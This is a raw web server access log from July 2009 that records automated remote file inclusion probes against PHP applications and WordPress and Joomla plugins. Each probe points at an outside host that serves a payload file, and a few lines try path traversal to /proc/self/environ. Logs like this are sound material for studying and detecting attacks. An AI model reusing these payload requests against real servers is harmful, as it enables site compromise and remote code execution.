124.0.103.194 - - [18/Jul/2009:00:55:49 -0400] "GET /logs/access_log.Q109052500%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
62.58.32.74 - - [18/Jul/2009:00:55:50 -0400] "GET /logs/error_log.Q109061700/errors.php?error=http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
124.0.103.194 - - [18/Jul/2009:00:56:02 -0400] "GET /logs/access_log.Q109062300%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
87.230.9.68 - - [18/Jul/2009:00:56:53 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ohid.se/image?? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.59.12.99 - - [18/Jul/2009:00:58:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.91.170 - - [18/Jul/2009:00:58:50 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ohid.se/image?? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
124.0.145.1 - - [18/Jul/2009:00:59:43 -0400] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:00:59:43 -0400] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:00:59:43 -0400] "GET /logs/access_log.Q109052500%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:00:59:48 -0400] "GET /logs/access_log.Q109063000%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:01:00:12 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:01:00:12 -0400] "GET /logs/access_log.Q109051700//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:01:00:12 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:01:00:34 -0400] "GET /logs/access_log.Q109053100//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:01:00:55 -0400] "GET /logs/access_log.Q109061400///?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:01:02:43 -0400] "GET /logs/access_log.Q109061400///?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:01:03:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [18/Jul/2009:01:03:20 -0400] "GET /logs/access_log.Q109061200///?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:01:03:21 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:01:03:25 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:01:04:43 -0400] "GET /logs/access_log.Q109061200///?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.236.242.164 - - [18/Jul/2009:01:04:56 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ohid.se/image?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.236.242.164 - - [18/Jul/2009:01:04:56 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ohid.se/image?? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.236.242.164 - - [18/Jul/2009:01:04:56 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ohid.se/image?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.59.21.101 - - [18/Jul/2009:01:05:25 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:05:25 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:05:25 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
124.0.103.194 - - [18/Jul/2009:01:05:38 -0400] "GET /logs/access_log.Q109052500///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
124.0.103.194 - - [18/Jul/2009:01:05:50 -0400] "GET /logs/access_log.Q109062300///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
87.230.9.68 - - [18/Jul/2009:01:05:52 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.230.9.68 - - [18/Jul/2009:01:05:52 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.230.9.68 - - [18/Jul/2009:01:05:53 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:05:57 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:05:57 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:05:57 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
89.108.91.170 - - [18/Jul/2009:01:06:29 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.108.91.170 - - [18/Jul/2009:01:06:29 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.108.91.170 - - [18/Jul/2009:01:06:30 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
87.230.9.68 - - [18/Jul/2009:01:06:31 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.230.9.68 - - [18/Jul/2009:01:06:31 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.230.9.68 - - [18/Jul/2009:01:06:31 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
89.108.91.170 - - [18/Jul/2009:01:07:01 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.108.91.170 - - [18/Jul/2009:01:07:02 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.108.91.170 - - [18/Jul/2009:01:07:02 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
121.78.116.209 - - [18/Jul/2009:01:07:40 -0400] "GET /logs/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:07:40 -0400] "GET /errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:07:40 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:07:40 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:01:08:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [18/Jul/2009:01:08:18 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:08:19 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:08:19 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:08:23 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:09:15 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:09:15 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:09:15 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:09:16 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:10:05 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:10:05 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:10:05 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:10:05 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:06 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:06 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:06 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:07 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:10:45 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:10:45 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:49 -0400] "GET /errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:49 -0400] "GET /logs/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:49 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:10:58 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:10:58 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:10:58 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:10:58 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:10:59 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:11:58 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:11:58 -0400] "GET //galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:11:58 -0400] "GET /logs//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:12:03 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.198.76.196 - - [18/Jul/2009:01:12:24 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
213.198.76.196 - - [18/Jul/2009:01:12:24 -0400] "GET //galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
213.198.76.196 - - [18/Jul/2009:01:12:24 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
213.198.76.196 - - [18/Jul/2009:01:12:25 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
114.200.199.144 - - [18/Jul/2009:01:12:28 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:12:28 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:12:28 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.145.31.242 - - [18/Jul/2009:01:12:32 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 257 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
218.145.31.242 - - [18/Jul/2009:01:12:33 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
218.145.31.242 - - [18/Jul/2009:01:12:33 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 257 "-" "XXXXXX"
218.145.31.242 - - [18/Jul/2009:01:12:34 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 257 "-" "XXXXXX"
202.88.229.100 - - [18/Jul/2009:01:12:35 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:12:35 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:12:35 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:12:35 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:12:43 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.59.21.101 - - [18/Jul/2009:01:13:00 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.59.12.99 - - [18/Jul/2009:01:13:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [18/Jul/2009:01:13:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:01:13:29 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:01:13:29 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:13:38 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:13:38 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:13:38 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:13:38 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:13:38 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:13:43 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:01:13:44 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:13:46 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:13:46 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:14:14 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.59.21.101 - - [18/Jul/2009:01:14:15 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
110.45.138.139 - - [18/Jul/2009:01:14:21 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:14:21 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:01:14:31 -0400] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:01:14:31 -0400] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:01:14:31 -0400] "GET /logs/access_log.Q109051800///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
110.45.138.139 - - [18/Jul/2009:01:14:31 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:14:36 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [18/Jul/2009:01:14:58 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ohid.se/image?? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
124.0.145.1 - - [18/Jul/2009:01:14:58 -0400] "GET /logs/access_log.Q109051300///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
213.198.76.196 - - [18/Jul/2009:01:15:02 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
213.198.76.196 - - [18/Jul/2009:01:15:02 -0400] "GET //galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
